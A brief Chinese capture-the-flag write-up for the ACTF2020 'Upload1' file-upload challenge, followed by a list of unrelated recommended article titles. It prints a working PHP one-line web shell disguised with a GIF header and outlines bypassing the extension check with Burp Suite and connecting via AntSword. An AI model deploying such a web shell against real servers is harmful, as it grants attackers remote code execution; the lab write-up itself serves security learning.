1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
无极程序员34 分钟前
PHP常量萌面小侠Plus2 小时前
Android笔记(三十三):封装设备性能级别判断工具——低端机还是高端机慢慢成长的码农2 小时前
Android Profiler 内存分析大风起兮云飞扬丶2 小时前
Android——多线程、线程通信、handler机制L72562 小时前
Android的Handler清风徐来辽2 小时前
Android HandlerThread 基础HerayChen3 小时前
HbuildderX运行到手机或模拟器的Android App基座识别不到设备 mac顾北川_野3 小时前
Android 手机设备的OEM-unlock解锁 和 adb push文件hairenjing11233 小时前
在 Android 手机上从SD 卡恢复数据的 6 个有效应用程序小黄人软件3 小时前
android浏览器源码 可输入地址或关键词搜索 android studio 2024 可开发可改地址